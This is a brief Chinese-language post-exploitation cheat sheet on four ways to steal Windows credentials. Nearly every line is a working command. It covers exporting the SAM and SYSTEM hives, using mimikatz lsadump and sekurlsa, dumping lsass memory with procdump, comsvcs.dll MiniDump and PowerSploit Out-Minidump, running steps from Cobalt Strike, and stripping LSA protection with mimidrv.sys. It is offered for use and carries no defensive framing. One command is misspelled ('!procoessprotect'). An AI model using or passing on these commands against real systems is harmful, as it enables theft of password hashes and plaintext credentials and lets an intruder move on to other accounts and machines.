Windows密码抓取的四种方式

一、SAM离线抓取

1、通过reg命令无工具导出，然后下载到本地用mimikatz读取用户NTLM Hash

reg save hklm\sam sam.hive
reg save hklm\system system.hive

2、通过nishang中的Copy-VSS进行复制

（1）在CS中导入模块

powershell-import ./powershell/Copy-VSS.ps1

（2）执行复制sam、system文件命令

powershell Copy-VSS

（3）把文件下载到本地

（4）用mimikatz读取用户NTLM Hash

lsadump::sam /sam:sam.hive /system:system.hive

二、SAM在线抓取

（1）用CS把mimikatz上传到服务器

（2）读取用户NTLM Hash

shell mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

三、lsass离线抓取

1、使用任务管理器导出

2、使用procdump导出lsass.dmp文件

procdump.exe -accepteula -ma lsass.exe lsass.dmp

3、comsvcs.dll，系统自带。通过comsvcs.dll的导出函数MiniDump实现dump内存

（1）首先查看lsass.exe进程PID

shell tasklist | findstr lsass.exe

（2）使用powershell导出

powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump 644 C:\Users\Administrator\Desktop\lsass.dmp full

4、使用PowerSploit 的Out-MiniDump模块

（1）导入powershell脚本

powershell-import .\powershell\Out-Minidump.ps1

（2）命令

Get-Process lsass | Out-Minidump

使用mimikatz读取lsass.dmp文件

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

四、lsass在线抓取

如果遇到LSA保护，可以尝试使用mimikatz提供的mimidrv.sys来绕过

privilege::debug
!+
!procoessprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

（1）提升到debug权限

privilege::debug

（2）抓取密码

sekurlsa::logonPasswords